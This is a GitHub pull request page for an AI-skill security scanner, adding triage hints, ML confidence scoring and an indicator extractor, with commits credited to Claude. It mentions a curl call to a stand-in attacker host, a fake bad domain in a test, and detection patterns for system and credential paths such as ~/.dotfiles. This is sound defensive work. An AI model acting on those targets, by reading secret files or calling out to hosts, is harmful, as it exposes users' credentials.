feat(scan): defense-in-depth triage hints (Item E) by kurtpayne · Pull Request #211 · kurtpayne/skillscan-security

kurtpayne · 2026-04-26T23:05:37Z

Summary

Item E of the post-v4.7 pivot. The scanner has 4 detection layers (static rules, IOC matching, ML, optional behavioral trace). Today they fire independently. This PR adds cross-layer triage hints — advisory recommendations surfaced in `ScanReport.triage_hints` after all layers have run.

Hints don't change the verdict or score. They tell the user why the verdict came out as it did and what action could improve confidence.

Hint types

ID	Trigger	Recommendation
H001 ESCALATE_TO_TRACE	PINJ-ML-001 fires with `logit_confidence < 0.7` AND no static-rule corroboration on the same file	Run `skillscan-trace` for behavioral verification
H002 INTEL_GAP	Finding has indicators (URL/domain/IP) not present in the IOC database	Run `skillscan intel refresh` or manually verify
H003 STRONG_CORROBORATION	ML + static rule both fire on the same file	Informational — verdict is well-corroborated

Stack note

This PR depends on #205 (logit_confidence) and #208 (indicators). Both base commits are cherry-picked into this branch so the diff is self-contained. Once #205 and #208 land in main, this PR rebases cleanly (cherry-picks become no-ops).

Implementation

`Indicator`, `logit_confidence`, `TriageHint` models in `models.py` (strictly additive — `ScanReport.triage_hints` defaults to `[]`).
`skillscan.triage_hints.compute_triage_hints(findings, iocs)` — pure function, easily unit-testable.
Wired into `analysis_pkg/_scanner.py` after findings are collected. Wrapped in `try/except` — a hint bug never breaks the scanner.
IOC value normalisation strips `http(s)://` scheme so URL indicators match domain-shaped IOCs.

Test plan

`SKILLSCAN_NO_USER_RULES=1 pytest tests/test_triage_hints.py -v` — 18/18 passing
Full suite (excluding 7 stale-rule tests already fixed by test: align test_rules.py with rules-snapshot at 2026.04.25 (unblocks main) #204): 765 passed, 8 skipped
`ruff format` + `ruff check` — clean on all touched files
Manual smoke against the bundled v4 GGUF on a held-out skill: confirm the H001/H002/H003 trio surfaces correctly when `--ml-detect` runs

Future work (not in this PR)

SARIF integration: emit hints as additional rule properties
Text/CLI summary: add a "Recommendations" section after the findings table
Skillscan-trace integration: when H001 emits, the trace tool could deep-link back to the originating ML finding

🤖 Generated with Claude Code

+        hints = compute_triage_hints([f], iocs)
+        h002 = [h for h in hints if h.id == "H002"]
+        assert len(h002) == 1
+        assert "novel-bad.io" in h002[0].detail


codecov · 2026-04-26T23:26:06Z

Codecov Report

❌ Patch coverage is 90.44586% with 30 lines in your changes missing coverage. Please review.
✅ Project coverage is 76.61%. Comparing base (f72c00e) to head (ef01c17).
⚠️ Report is 2 commits behind head on main.

Files with missing lines	Patch %	Lines
src/skillscan/ml_detector.py	75.80%	15 Missing ⚠️
src/skillscan/indicators.py	94.67%	9 Missing ⚠️
src/skillscan/analysis_pkg/_scanner.py	44.44%	5 Missing ⚠️
src/skillscan/triage_hints.py	98.33%	1 Missing ⚠️

Additional details and impacted files

@@            Coverage Diff             @@
##             main     #211      +/-   ##
==========================================
+ Coverage   75.87%   76.61%   +0.73%     
==========================================
  Files          41       43       +2     
  Lines        5994     6307     +313     
==========================================
+ Hits         4548     4832     +284     
- Misses       1446     1475      +29

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

Item C of the post-v4.7 pivot. Replaces "look at line 12" with "look at the curl to evil.example.com on line 12" by post-processing the model's output (no retraining required). Adds: - skillscan.models.Indicator — pydantic model with type/value/line/evidence - skillscan.models.Finding.indicators — new optional list field (default [], backward-compatible with all existing consumers) - skillscan.indicators — extractor module with regex-based extractors for 6 indicator types: url — http(s) URLs (terminator-aware: shell substitution $(...) and backticks don't get absorbed) cve — CVE-YYYY-NNNN[NNN], also extracted from `reasoning` text (model often cites CVEs not in skill body) ip — IPv4 dotted-quad with octet validation; localhost noise floor (127.x, 0.0.0.0) domain — bare hostnames not already surfaced by URL extractor; lookbehind blocks parent-domain dupes (`nist.gov` inside `nvd.nist.gov`); 30-entry common-domain noise floor (github, npm, pypi, anthropic, ...) package — npm scoped (@scope/name) anywhere; pip/npm/yarn/pnpm install command line capture (multi-package) file_path — /etc, /var, /tmp, /usr, /root system paths; ../../traversal; ~/.dotfiles; Windows C:\ - 25 unit tests covering each extractor and a realistic-skill integration - Wiring in ml_detector.py: extract_indicators() runs once per file and the same list is attached to each label-specific Finding produced. Wrapped in try/except — extractor failure never breaks the scanner. Conservative posture: when in doubt, drop. False indicators are worse than missing ones because they give downstream tooling bad targets to act on. Cap is 50 indicators per finding. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

The discrete `confidence` field the model emits buckets at 0.9 / 0.95 / 1.0 (83% at 0.95) — useless for thresholding because every wrong prediction also lands at 0.95. Eval data on v4.7's 431-file held-out set: all 4 model errors had logit_confidence ∈ [0.58, 0.76]; all 426 correct predictions had logit_confidence ≥ 0.99 except a handful in [0.80, 0.99]. Threshold 0.80 flags 100% of errors while accepting 94% of files. Implementation: - Load the GGUF with `logits_all=True` so llama-cpp-python returns per-token logprobs. - Inference passes `logprobs=True, top_logprobs=5` alongside the existing GBNF grammar. Falls back gracefully (one-shot retry without logprobs) when an older llama-cpp-python rejects the args. - _extract_logit_confidence() finds the verdict-starting token and softmaxes the logp(ben) vs logp(mal) entries to produce continuous P(predicted_verdict) ∈ [0, 1]. Handles the missing-from-top-K case with a soft floor. - Surfaced as Finding.logit_confidence (Optional[float]). Older clients without logprobs payloads get None — fully backward-compatible. Severity mapping is unchanged in this commit; logit_confidence is an additional signal that downstream tooling can threshold against. Future PR can fold it into severity demotion (e.g., MED → LOW when logit < 0.7). Eval evidence: skillscan-corpus/eval_results/v47_logit_confidence_eval.json Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Closes Item B's user-facing promise: \"Enables --threshold 0.85 for CI gates\". The earlier commit added Finding.logit_confidence; this commit makes it actually usable from the command line. Adds --ml-threshold (also SKILLSCAN_ML_THRESHOLD env var, default 0.0). When > 0, drops PINJ-ML-001 findings whose logit_confidence is below the threshold. Advisory findings (PINJ-ML-NO-MODEL/STALE/LARGE-FILE/UNAVAIL) are never filtered. Findings without logit_confidence (older clients) are also never filtered — backward-safe. Recommended thresholds (per the 431-file v4.7 held-out eval): --ml-threshold 0.99 — keeps 60%, all correct (strictest CI gate) --ml-threshold 0.90 — keeps 87%, all correct --ml-threshold 0.80 — keeps 94%, all correct, drops every model error --ml-threshold 0.70 — keeps 97%, 99.5% correct (lenient) Plumbed through scanner.scan() at three CLI callsites + the underlying _scanner.scan(). No CLI flag at default = no behaviour change for existing users. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Cross-layer recommendations surfaced in ScanReport.triage_hints. Hints are advisory — they do NOT change the verdict or score. They run after all detection layers (static rules, IOC, ML, optional trace) have fired and emerge from the combined signal. Hint types: H001 ESCALATE_TO_TRACE — ML detected with logit_confidence < 0.7 AND no static-rule corroboration on the same file. Recommend skillscan-trace for behavioral verification. H002 INTEL_GAP — Indicators (URL/domain/IP) extracted from a finding aren't present in the IOC DB. Recommend `skillscan intel refresh` or manual verification. H003 STRONG_CORROBORATION — ML + static rule both flagged the same file. Informational hint surfacing the multi-layer agreement. Builds on Item B's logit_confidence (uncertainty signal) and Item C's indicators (cross-reference target). Integration: - models.py: TriageHint model + ScanReport.triage_hints field (default [], strictly additive) - triage_hints.py: pure-function compute_triage_hints(findings, iocs) - analysis_pkg/_scanner.py: invoked after findings are collected, wrapped in try/except — a hint bug never breaks the scanner - 18 unit tests covering each hint, per-file isolation, advisory suppression, IOC URL normalisation, edge cases Future work (not in this PR): SARIF properties, text-output rendering of hints in the CLI summary section. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

github-advanced-security AI found potential problems Apr 26, 2026

View reviewed changes

Comment thread tests/test_triage_hints.py

hints = compute_triage_hints([f], iocs)

h002 = [h for h in hints if h.id == "H002"]

assert len(h002) == 1

assert "novel-bad.io" in h002[0].detail

kurtpayne and others added 4 commits April 26, 2026 17:09

kurtpayne force-pushed the feat/ml-defense-output branch from 63a111b to ef01c17 Compare April 27, 2026 00:09

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

feat(scan): defense-in-depth triage hints (Item E)#211

feat(scan): defense-in-depth triage hints (Item E)#211
kurtpayne wants to merge 4 commits into
mainfrom
feat/ml-defense-output

kurtpayne commented Apr 26, 2026

Uh oh!

codecov Bot commented Apr 26, 2026 •

edited

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

kurtpayne commented Apr 26, 2026

Summary

Hint types

Stack note

Implementation

Test plan

Future work (not in this PR)

Uh oh!

codecov Bot commented Apr 26, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Codecov Report

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

codecov Bot commented Apr 26, 2026 •

edited

Loading